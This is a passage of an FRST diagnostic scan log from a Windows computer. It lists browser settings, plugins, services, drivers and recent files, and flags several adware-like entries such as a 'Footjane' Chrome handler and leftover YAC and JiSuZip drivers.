Tcpip\..\Interfaces\{880E39D8-3E0A-4A45-9DD1-49F1A207180F}: [DhcpNameServer] 10.255.255.10 10.255.255.20 8.8.8.8 192.168.1.1

Internet Explorer:
==================
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL =
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Local Page =
HKU\.DEFAULT\Software\Microsoft\Internet Explorer\Main,Start Page = about:blank
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.msn.com/?ocid=iehp
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxps://search.avira.net/#web/result?source=art&q=
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {03A35688-219B-40F5-AFC8-7A437C49429D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {09F1332C-51BE-4C3D-9F77-6336BC0ECF20} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {0C2DE69F-5155-4FD6-A5F4-7EDDA54CF7C7} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {0E29DD56-64FC-413E-8F41-5F0535696FDF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {1109940C-95FA-4E03-A2F2-A28897FB6766} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {14B5528E-A863-4962-9F60-35569D3A1D1C} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {14E9506E-6D62-4741-9179-44D48CFCD8D2} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {16EF7AD8-DB44-443A-BCFB-D50A947D99BF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {171CF743-D4F4-4CB1-87BC-7E191F913FC3} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {1B8A65AA-BDF6-470E-B140-356633DFA09A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {204DFD3C-EB06-4456-83C5-CCBF1ED48440} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2547CEC6-613C-43E4-A593-CC2069084999} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {25BA9130-4A0D-46EF-ADB0-73F1C655CF45} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {26A469EA-AA26-4747-81C6-0E1DBEEB2C13} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2C587672-09A4-4A45-9B9B-58A9FE436EF8} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2C9084D8-A408-42AB-8E29-6BD020D24440} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {2EC50B37-C4AD-44AB-BA23-D5AAD093C41A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {33A41A2E-33C2-4E13-BE84-3559916A6889} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {34109212-EC73-44D1-BA1D-E129C381F861} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {3421CDC7-4296-4974-A5F7-B5684D8919B1} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {34525437-CA15-4A19-9417-26E92976BC39} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {365B2F7A-0D50-4476-B107-CB48F4658122} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {380E9DF0-D28C-49C4-BEC9-B7F5FC964664} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {43B1BB36-70BE-4F59-BCA6-F429FCF4137C} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {45B33A18-F60E-4AE0-9CAC-5967F87CE983} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {45D166C3-631A-473D-8730-D0ADFD3A6F11} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {464C8606-EF57-4BE1-9060-3966C4EB5C4D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {4D856560-95D3-4C63-A1AA-AD9802529D26} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {5949EADF-9F7D-4C65-8677-313ED03A8983} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {5E7721A4-8B1A-422D-A170-9A7B384FB535} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {6150EBBB-6B17-4DD1-8E8C-3FFBF198E57A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {61DCF235-11FE-42E4-B3A5-9777503B4BA7} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {659202E6-50F9-46C7-A428-5F75DB77AF0B} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {666C57AA-3376-458E-A26F-708CC9B1FF6D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {69A0C7C2-B8EB-43F1-8C7D-BEDD21F3DB0E} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {6CA1EBCC-3860-4C12-9471-FEB4058AE6F5} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {6E2F5E9C-61D5-490B-BE27-DB2989EC9181} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {726310B3-DC05-482A-8873-5CD3627CADFC} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {72CDA94A-2548-4F40-B7D2-280600756A39} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {74934A3E-ACD6-4B9E-9C4C-C78415A9B457} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {873D163A-C7EE-486E-AD02-F14AB4F425EE} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {8E2BFB58-D681-41BD-A2C8-CA15440D1EBF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {8E9D7148-305D-4F6D-A505-EBFB69404960} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {8EE27882-ACAA-4340-AEA5-719145283051} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {94700D82-D8C1-42F7-959E-CAD9A16ADBAE} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {97CB2411-D33F-411A-9813-127915E7C4E2} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {9A5A4683-6234-4E10-8AF3-E4FA491D4EB3} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A19F8F23-6424-4131-AE98-D1DACF4876CA} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A3B40275-870B-498B-BD19-B5702E8B61A2} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A810E43A-313B-4571-8D1D-6DEC89C6B1D7} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A9689D8D-DD63-4900-BD1D-9E6F8E7D26DF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {A9AFD5C7-DB69-4A9D-BF1A-8B33473351A4} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {AB73B2ED-F705-4656-9490-B2C6B2AEB6C6} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {AEBA8DD8-21D0-4DB6-A4F2-B4C5569260CA} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {AFD30DD4-F70E-4D36-BD50-FB5DA3AAEECF} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B37AD013-C2D0-40F3-97D9-0472349E9C44} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B3D3A37C-4613-432E-8E3A-53E589157C4D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B6CA1B24-2418-4737-BB1A-6AB0CC0DF5AC} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B71E823F-B4CC-4FB0-A8CC-DC505018DC1E} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {B9A6127D-16DE-481F-B9CA-4B397968F86A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BA398AD4-309C-4915-9C6C-60140565F949} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BA7DE47C-7957-4F39-85B5-BDADF2C1F23D} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BF82F267-1D54-46D3-B76F-22D6A302F0EB} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {BFE3BE80-727C-44AB-99DE-BAF4905AD5F9} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {C0095A98-BEAC-4C7D-89CD-23EDC7F1B0C1} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {C5FCA41F-794E-418D-B3AE-C5D2A9AB42A9} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {C6404912-B3FD-49D2-A88E-B88706C2E34A} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CBE76AAC-7419-4CDE-98F3-48926A7E9121} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CC0BD598-A1C5-475E-AEB4-9A0CC3C53476} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CEDE0664-DEDC-4FA7-A393-3A2258C3D6A5} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {CFD8262B-801B-4471-B023-D1EA7C06C2B6} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {D0FAF6B0-BE3C-4C6D-B8BD-E307B77D2678} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {D46AAFD7-49B7-4EDA-8081-F4ED3B3B5580} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {E13E38A8-753A-4FD1-904A-066F681EDC1F} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {E6138BC0-A1E9-47D4-B000-FA1B4F043F92} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {E8D0F6D5-572F-4F61-A09D-85D1CF0BA2FA} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {EBF29334-C208-4510-9CA2-4E7D84F02AB4} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {EF0BA1F2-5C7B-4FC4-B685-50C92BCD1FC4} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {F05B18BC-48EC-4676-A4EF-2B0779FBC7C8} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {F068E404-672E-429C-A601-117CA8E6F64B} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {F08DC883-0E75-4743-926F-07C2C076133F} URL =
SearchScopes: HKU\S-1-5-21-2652530150-2383877666-4203637229-1007 -> {FBFB7078-3DAC-4B24-8CF6-2B36D1202F93} URL =
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll [2013-08-28] (Hewlett-Packard Company -> Hewlett-Packard)
BHO-x32: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPlugin.dll [2013-08-28] (Hewlett-Packard Company -> Hewlett-Packard)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF DefaultProfile: 1j8n8vuz.default-1563958825578
FF ProfilePath: C:\Users\Radim\AppData\Roaming\Mozilla\Firefox\naweriweentcofise\Profiles\GQD9zH3G.default\Profiles\GQD9zH3G.default [not found] <==== ATTENTION
FF ProfilePath: C:\Users\Radim\AppData\Roaming\Mozilla\Firefox\Profiles\1j8n8vuz.default-1563958825578 [2019-07-31]
FF Extension: (AdBlock) - C:\Users\Radim\AppData\Roaming\Mozilla\Firefox\Profiles\1j8n8vuz.default-1563958825578\Extensions\jid1-NIfFY2CA8fy1tg@jetpack.xpi [2019-07-28]
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_32_0_0_223.dll [2019-07-09] (Adobe Inc. -> )
FF Plugin: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-05-03] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files\Java\jre7\bin\plugin2\npjp2.dll [2014-05-03] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin: @videolan.org/vlc,version=2.2.2 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-06-11] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.6 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-06-11] (VideoLAN -> VideoLAN)
FF Plugin: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files\VideoLAN\VLC\npvlc.dll [2019-06-11] (VideoLAN -> VideoLAN)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_223.dll [2019-07-09] (Adobe Inc. -> )
FF Plugin-x32: @Google.com/GoogleEarthPlugin -> C:\Program Files (x86)\Google\Google Earth\plugin\npgeplugin.dll [2013-10-07] (Google) [File not signed]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.66 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2014-04-29] (Internal - IntelÂ® Identity Protection Technology Software -> Intel Corporation) [File not signed]
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2014-04-29] (Internal - IntelÂ® Identity Protection Technology Software -> Intel Corporation) [File not signed]
FF Plugin-x32: @java.com/DTPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\dtplugin\npDeployJava1.dll [2014-05-03] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=10.55.2 -> C:\Program Files (x86)\Java\jre7\bin\plugin2\npjp2.dll [2014-05-03] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> C:\Program Files (x86)\Microsoft Silverlight\5.1.50918.0\npctrl.dll [2018-10-23] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 11.0\Reader\AIR\nppdf32.dll [2013-12-21] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-2652530150-2383877666-4203637229-1007: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Radim\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2015-11-01] (Unity Technologies SF -> Unity Technologies ApS)
StartMenuInternet: FIREFOX.EXE - firefox.exe

Chrome:
=======
CHR HKLM\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [flliilndjeohchalpbbcdekjklbdgfkk] - hxxps://clients2.google.com/service/update2/crx
StartMenuInternet: Google Chrome - Chrome.exe
HKU\S-1-5-21-2652530150-2383877666-4203637229-1007\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Footjane\Application\chrome.exe <==== ATTENTION

==================== Services (Whitelisted) ====================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R2 AMD External Events Utility; C:\WINDOWS\system32\atiesrxx.exe [239616 2014-08-04] (Microsoft Windows Hardware Compatibility Publisher -> AMD)
R3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6797008 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R2 avast! Antivirus; C:\Program Files\AVAST Software\Avast\AvastSvc.exe [414976 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
S3 Disc Soft Lite Bus Service; C:\Program Files\DAEMON Tools Lite\DiscSoftBusService.exe [1443520 2016-04-04] (Disc Soft Ltd -> Disc Soft Ltd)
S3 HotSpotSrv; C:\Program Files (x86)\Hewlett-Packard\HP Wireless Hotspot\HotSpotSrv.exe [372920 2013-09-18] (Hewlett-Packard Company -> Hewlett-Packard Development Company, L.P.)
R2 igfxCUIService1.0.0.0; C:\WINDOWS\system32\igfxCUIService.exe [330136 2015-08-27] (Intel Corporation - pGFX -> Intel Corporation)
R2 Intel(R) Capability Licensing Service Interface; C:\Program Files\Intel\iCLS Client\HeciServer.exe [732160 2012-12-10] (Intel(R) Corporation) [File not signed]
S3 Intel(R) Capability Licensing Service TCP IP Interface; C:\Program Files\Intel\iCLS Client\SocketHeciServer.exe [803872 2012-12-10] (IntelÂ® Trusted Connect Service -> Intel(R) Corporation)
R2 Intel(R) ME Service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\FWService\IntelMeFWService.exe [131032 2014-04-29] (Intel Corporation - IntelÂ® Management Engine Firmware -> Intel Corporation)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\DAL\jhi_service.exe [165336 2014-04-29] (Intel Corporation - IntelÂ® Management Engine Firmware -> Intel Corporation)
R2 LicCtrlService; C:\WINDOWS\runservice.exe [16384 2016-05-18] () [File not signed]
S3 Origin Client Service; C:\Program Files (x86)\Origin\OriginClientService.exe [2159424 2018-03-19] (Electronic Arts, Inc. -> Electronic Arts)
R2 Origin Web Helper Service; C:\Program Files (x86)\Origin\OriginWebHelperService.exe [3028808 2018-03-19] (Electronic Arts, Inc. -> Electronic Arts)
R2 STacSV; C:\Program Files\IDT\WDM\STacSV64.exe [327680 2014-04-29] (IDT, Inc.) [File not signed]
R2 TeamViewer; C:\Program Files (x86)\TeamViewer\TeamViewer_Service.exe [6942480 2016-03-02] (TeamViewer -> TeamViewer GmbH)
S3 WdNisSvc; C:\Program Files\Windows Defender\NisSrv.exe [361824 2017-05-14] (Microsoft Corporation -> Microsoft Corporation)
S3 WinDefend; C:\Program Files\Windows Defender\MsMpEng.exe [119872 2017-05-14] (Microsoft Corporation -> Microsoft Corporation)

===================== Drivers (Whitelisted) ======================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

R3 Accelerometer; C:\WINDOWS\system32\DRIVERS\Accelerometer.sys [43328 2012-08-21] (Hewlett-Packard Company -> Hewlett-Packard Company)
R3 amdkmdag; C:\WINDOWS\system32\DRIVERS\atikmdag.sys [12534784 2014-08-04] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R3 amdkmdap; C:\WINDOWS\system32\DRIVERS\atikmpag.sys [619008 2014-08-04] (Microsoft Windows Hardware Compatibility Publisher -> Advanced Micro Devices, Inc.)
R0 amdkmpfd; C:\WINDOWS\System32\drivers\amdkmpfd.sys [37088 2014-08-05] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
R0 aswArDisk; C:\WINDOWS\System32\drivers\aswArDisk.sys [37320 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\WINDOWS\System32\drivers\aswArPot.sys [209256 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\WINDOWS\System32\drivers\aswbidsdriver.sys [263224 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\WINDOWS\System32\drivers\aswbidsh.sys [206056 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\WINDOWS\System32\drivers\aswbuniv.sys [61688 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswHdsKe; C:\WINDOWS\System32\drivers\aswHdsKe.sys [279336 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\WINDOWS\System32\drivers\aswKbd.sys [42504 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\WINDOWS\System32\drivers\aswMonFlt.sys [169112 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\WINDOWS\System32\drivers\aswRdr2.sys [112520 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\WINDOWS\System32\drivers\aswRvrt.sys [88160 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\WINDOWS\System32\drivers\aswSnx.sys [1030992 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\WINDOWS\System32\drivers\aswSP.sys [477288 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R2 aswStm; C:\WINDOWS\System32\drivers\aswStm.sys [225816 2019-07-24] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\WINDOWS\System32\drivers\aswVmm.sys [387896 2019-07-25] (AVAST Software s.r.o. -> AVAST Software)
R2 atksgt; C:\WINDOWS\System32\DRIVERS\atksgt.sys [312480 2016-01-01] (Tages SA -> )
S3 bcmfn2; C:\WINDOWS\System32\drivers\bcmfn2.sys [17624 2013-08-13] (Broadcom Corporation -> Windows (R) Win 7 DDK provider)
R1 CLVirtualDrive; C:\WINDOWS\system32\DRIVERS\CLVirtualDrive.sys [92536 2012-06-25] (CyberLink -> CyberLink)
R3 clwvd; C:\WINDOWS\system32\DRIVERS\clwvd.sys [40944 2012-08-27] (CyberLink -> CyberLink Corporation)
R3 dtlitescsibus; C:\WINDOWS\System32\drivers\dtlitescsibus.sys [30264 2016-04-17] (Disc Soft Ltd -> Disc Soft Ltd)
R3 dtliteusbbus; C:\WINDOWS\System32\drivers\dtliteusbbus.sys [47672 2016-04-17] (Disc Soft Ltd -> Disc Soft Ltd)
S3 Hamachi; C:\WINDOWS\system32\DRIVERS\Hamdrv.sys [45680 2019-04-02] (Microsoft Windows Hardware Compatibility Publisher -> LogMeIn Inc.)
R0 hpdskflt; C:\WINDOWS\System32\DRIVERS\hpdskflt.sys [31040 2012-08-21] (Hewlett-Packard Company -> Hewlett-Packard Company)
R1 HWiNFO32; C:\WINDOWS\SysWOW64\drivers\HWiNFO64A.SYS [27552 2016-03-15] (Martin Malik - REALiX -> REALiX(tm))
R2 lirsgt; C:\WINDOWS\System32\DRIVERS\lirsgt.sys [43168 2016-01-01] (Tages SA -> )
R3 netr28x; C:\WINDOWS\system32\DRIVERS\netr28x.sys [2505904 2013-12-04] (Mediatek Inc. -> Ralink Technology, Corp.)
R3 RTL8168; C:\WINDOWS\system32\DRIVERS\Rt630x64.sys [591360 2013-06-18] (Microsoft Windows -> Realtek )
S4 secdrv; C:\Windows\SysWow64\Drivers\secdrv.sys [163644 2019-04-08] (Macrovision Corporation, Macrovision Europe Limited, and Macrovision Japan and Asia K.K.) [File not signed]
R3 SensorsServiceDriver; C:\WINDOWS\System32\drivers\WUDFRd.sys [226304 2014-10-29] (Microsoft Windows -> Microsoft Corporation)
R3 SNP2UVC; C:\WINDOWS\system32\DRIVERS\snp2uvc.sys [2621128 2015-07-15] (Sonix Technology CO., LTD -> Sonix Tech. Co., Ltd.)
R2 speedfan; C:\WINDOWS\SysWOW64\speedfan.sys [28664 2012-12-29] (SOKNO S.R.L. -> Almico Software)
R3 STHDA; C:\WINDOWS\system32\DRIVERS\stwrt64.sys [543744 2014-04-29] (Microsoft Windows Hardware Compatibility Publisher -> IDT, Inc.)
R3 t_mouse.sys; C:\WINDOWS\system32\DRIVERS\t_mouse.sys [6144 2013-04-09] (Microsoft Windows Hardware Compatibility Publisher -> )
S3 USBAAPL64; C:\WINDOWS\System32\Drivers\usbaapl64.sys [54784 2014-08-16] (Apple, Inc.) [File not signed]
S3 WdBoot; C:\WINDOWS\system32\drivers\WdBoot.sys [46600 2017-05-14] (Microsoft Windows Early Launch Anti-malware Publisher -> Microsoft Corporation)
S3 WdFilter; C:\WINDOWS\system32\drivers\WdFilter.sys [274776 2017-05-14] (Microsoft Windows -> Microsoft Corporation)
S3 WdNisDrv; C:\WINDOWS\System32\Drivers\WdNisDrv.sys [117592 2017-05-14] (Microsoft Windows -> Microsoft Corporation)
S3 WirelessButtonDriver; C:\WINDOWS\System32\drivers\WirelessButtonDriver64.sys [31840 2016-03-23] (Hewlett-Packard Company -> HP)
R3 WirelessButtonDriver64; C:\WINDOWS\system32\DRIVERS\WirelessButtonDriver64.sys [31840 2016-03-23] (Hewlett-Packard Company -> HP)
R1 WiserIso; C:\WINDOWS\System32\Drivers\vcdrom.sys [25432 2016-12-27] (ć·±ĺśłĺ¸‚çŚ«ĺ“ç˝‘ç»śç§‘ćŠ€ĺŹ‘ĺ±•ćś‰é™ĺ…¬ĺŹ¸ -> ) <==== ATTENTION
S3 BtAudioBusSrv; \SystemRoot\System32\Drivers\BtAudioBus.sys [X]
S3 BthL2caScoIfSrv; \SystemRoot\System32\Drivers\BtL2caScoIf.sys [X]
S3 btUrbFilterDrv; \SystemRoot\System32\Drivers\IvtUrbBtFlt.sys [X]
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] <==== ATTENTION
S1 JszipProtect; \??\C:\Program Files (x86)\Maoha\JiSuZip\JsZipProtect64.sys [X] <==== ATTENTION
S3 rtbth; \SystemRoot\System32\drivers\rtbth.sys [X]
S0 sptd; \SystemRoot\System32\Drivers\sptd.sys [X]

==================== NetSvcs (Whitelisted) ===================

(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)

==================== One month (created) ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2019-07-31 10:41 - 2019-07-31 10:42 - 000047011 _____ C:\Users\Radim\Desktop\FRST.txt
2019-07-31 10:41 - 2019-07-31 10:41 - 002096128 _____ (Farbar) C:\Users\Radim\Desktop\FRST64.exe
2019-07-31 10:41 - 2019-07-31 10:41 - 000000000 ____D C:\Users\Radim\Desktop\FRST-OlderVersion
2019-07-31 01:02 - 2019-07-31 01:06 - 000000000 ____D C:\AdwCleaner
2019-07-31 01:02 - 2019-07-31 01:02 - 007623880 _____ (Malwarebytes) C:\Users\Radim\Desktop\adwcleaner_7.4.exe
2019-07-30 12:25 - 2019-07-31 10:13 - 000004060 _____ C:\WINDOWS\System32\Tasks\Opera scheduled Autoupdate 1555619304
2019-07-30 12:25 - 2019-07-30 12:25 - 000001377 _____ C:\Users\Radim\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ProhlĂĹľeÄŤ Opera.lnk
2019-07-30 10:34 - 2019-07-31 10:41 - 000000000 ____D C:\FRST
2019-07-30 10:22 - 2019-07-31 10:13 - 000003166 _____ C:\WINDOWS\System32\Tasks\HPCeeScheduleForRadim
2019-07-30 10:22 - 2019-07-31 10:13 - 000000352 _____ C:\WINDOWS\Tasks\HPCeeScheduleForRadim.job
